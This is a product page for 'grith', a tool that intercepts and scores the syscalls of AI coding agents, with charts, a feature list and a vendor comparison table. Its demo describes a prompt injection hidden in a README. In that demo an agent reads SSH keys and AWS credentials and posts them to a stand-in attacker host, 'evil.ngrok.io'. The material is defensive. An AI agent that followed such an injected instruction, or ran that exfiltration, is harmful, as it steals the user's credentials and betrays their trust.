AI agents are making security decisions.
That's the problem.

Claude, Codex, Aider - they all decide what's safe.
grith intercepts every action and verifies it before execution.

See it block an attack Get early access

Without grith

LLM→decides→executes

With grith

LLM→security proxy→allow/deny→executes

Works with your existing tools

Claude Code

Codex

Aider

Cline

Goose

Gemini CLI

+ any agent

CVEs in AI-Powered IDEs

IDEsaster Research

Exploitation Rate

IDEsaster Research

Breach Alerts Ignored

Verizon 2024 DBIR

Exposed Instances

ClawHavoc Attack

Real Attack Scenario

This Is What Prompt Injection
Looks Like in Practice

A malicious README tells your agent to exfiltrate SSH keys. No prompt, no alert — unless grith is watching.

Without grithCompromised

$ agent "review this repo"

# Agent reads README.md with hidden injection

→ Reading project files...

→ Analysing codebase...

fs.read("~/.ssh/id_rsa")

fs.read("~/.aws/credentials")

net.post("https://evil.ngrok.io/collect",

body: { ssh_key, aws_creds })

⚠ Credentials exfiltrated to attacker server.

No alert was raised. No prompt was shown.

With grithProtected

$ grith exec -- agent "review this repo"

# Same repo, same hidden injection

→ Reading project files...

→ Analysing codebase...

fs.read("~/.ssh/id_rsa")

├─ path_match: +5.0

├─ taint_track: +3.0

└─ composite: 8.0 → AUTO-DENY ✕

✓ Attack blocked. Logged to audit trail.

Agent continued safely on remaining tasks.

Why this matters

AI agents don't just generate code. They interact with your operating system in ways that have real, irreversible consequences.

Read your files

Execute shell commands

Access credentials

Send network requests

They decide what's safe using probabilistic models.

That's not a security system.

Why Auto Mode is not enough

Auto Mode removes prompts.
It doesn't remove risk.

Claude's Auto Mode lets the agent approve its own actions. The permission prompts disappear, but the trust architecture stays the same.

✓Reduces prompts

✓Improves developer UX

✕Still relies on model judgment

✕Still vulnerable to prompt injection

✕Still no independent enforcement

grith removes the model from the trust boundary.

Every action is intercepted at the syscall level, scored by deterministic filters, and allowed or blocked independently of what the model thinks is safe.

How It Works

Intercept. Score. Decide.

Three-step pipeline, under 15ms. Works with any CLI agent — no modification needed.

Intercept

Wrap any CLI tool with grith exec. OS-level syscall interception captures every file open, network connection, and process spawn. No agent modification required.

Works with:

Claude Code, Codex, Aider, Cline, Open Interpreter, Goose — any CLI tool

Score

17 independent security filters evaluate each operation in parallel across three phases. Path matching, secret scanning, taint tracking, behavioural profiling, destination reputation — producing a composite score.

Phase 1 <1ms — static checks (6 filters)

Phase 2 ~3ms — pattern matching (5 filters)

Phase 3 ~5ms — context analysis (6 filters)

Decide

Composite score routes each call: auto-allow, queue for review, or auto-deny. Ambiguous calls are batched into a quarantine digest — reviewed on your schedule, not one-by-one.

80-90% auto-allowed

5-15% queued for digest review

1-5% auto-denied and logged

Works with Your Stack

One command wraps any CLI agent. Bring your own model, your own provider, your own workflow.

AI Agents

Claude Code

Codex

Gemini CLI

Aider

Cline

Goose

Open Interpreter

LLM Providers

Ollama

Anthropic

OpenAI

Google Gemini

OpenRouter

and any other CLI tool or OpenAI-compatible provider...

Developer Experience

What Developers Actually See

After every agent session, a clear summary. No digging through logs.

Session Summary

Session complete — 47 actions │ $1.40 │ 96% allowed

Tool calls: 47 Provider: Anthropic

├─ file_read 22 Model: Claude Sonnet

├─ file_write 12 Duration: 12m 08s

├─ shell_exec 9 Cost: $1.40

└─ net_request 4

Security: Quality:

├─ Allowed 45 (96%) ├─ Build ✓

├─ Queued 2 (4%) ├─ Tests ✓

└─ Denied 0 └─ Errors 0

Quarantine Digest

2 items pending review

1. shell_exec("npm install lodash")

Score: 4.2 │ new dependency install

Context: refactoring utils/helpers.ts

[a] approve [d] deny [l] learn

2. net.get("registry.npmjs.org/lodash")

Score: 3.8 │ outbound to new domain

Context: verifying package metadata

[a] approve [d] deny [l] learn

Analytics & Compliance

Analytics, Audit Trails &
Compliance — Built In

Every tool call logged. Every decision traceable. From cost tracking to enterprise compliance.

◈

Cost Tracking

Per-session, per-model, per-provider cost breakdowns. Budget alerts planned.

⊞

Full Audit Trail

Structured JSON logs for every tool call: what was requested, which filters fired, the composite score, and the decision.

⬡

Security Analytics

Decision split visualisation, filter hit rates, anomaly trends, and behavioural baselines over time.

◇

Compliance-Ready Audit Trail

Structured audit data designed to support SOC 2, NIST AI RMF, and HIPAA reporting workflows. Deterministic execution traces auditors can review.

SOC 2NIST AI RMFHIPAAEnterprise

⎔

SIEM / SOAR Export

Export AI agent security telemetry via webhook and JSON for integration with your existing monitoring stack. Treat AI agent actions like any other security event.

WebhookJSONOpenTelemetry (planned)Enterprise

Teams & Enterprise

Built for Teams.
Ready for Enterprise.

From two developers sharing a policy to 500 engineers with SSO, RBAC, and air-gapped deployment (Enterprise, planned).

New

Encrypted Team Key Sync

Add your Claude, OpenAI, OpenRouter, and other API keys to the grith dashboard once. Keys are encrypted at rest and synced to team members via `grith pro sync` — no credential sprawl.

New

Approval Channels

Quarantine digest items routed to Slack, Telegram, web dashboard, or email. Approve, deny, or learn from any device.

Pro

Centralised Policy Management

Shared security filter configurations across your team. Update allowlists, scoring thresholds, and path rules from a single dashboard.

Pro

Team Dashboard & Usage Analytics

Per-developer cost, security score, and session history at a glance.

Enterprise

SSO / SAML, RBAC & Air-Gapped Deployment (Planned)

Planned for v2.0: single sign-on via Okta, Azure AD, or any SAML provider. Role-based access controls. Full air-gapped and VPC deployments.

Team Dashboard

API Keys

● Anthropic ···4a7f active

● OpenAI ···9c2e active

● OpenRouter ···1d8b low balance

Team Activity (Today)

sarah │ 3 sessions │ $4.20 │ 98%

james │ 5 sessions │ $8.10 │ 95%

priya │ 2 sessions │ $2.80 │ 91%

Pending Approvals

▸ priya · net.post(ext-api.io) score 5.2

via #security-reviews Slack ✓

Policy

Config: acme-corp-v3.toml

Auto-deny: 8.0

Escalation: #security-reviews

Comparison

No Other Agent Has
Native Security Architecture

The only open-source, model-agnostic tool with per-syscall security evaluation.

Capability	grith	Cline	Aider	Open Interp.	Claude Code	Codex
Per-syscall interception	✓	—	—	—	coarse	container
CLI supervisor	✓	—	—	—	—	—
Multi-filter scoring	✓	—	—	—	—	—
Quarantine digest	✓	—	—	—	—	—
Model agnostic	✓	✓	✓	✓	—	—
Local-first	✓	✓	✓	✓	—	—
Open source	✓	✓	✓	✓	—	✓
Cost tracking	✓	—	—	—	—	—
Analytics & compliance	✓	—	—	—	—	—
Encrypted team key sync	✓	—	—	—	—	—
Multi-channel approvals	✓	—	—	—	—	—

Stop letting the model decide what's safe.

One command. Zero configuration. Wrap any agent.

Get early access

AI agents are making security decisions.That's the problem.

This Is What Prompt Injection Looks Like in Practice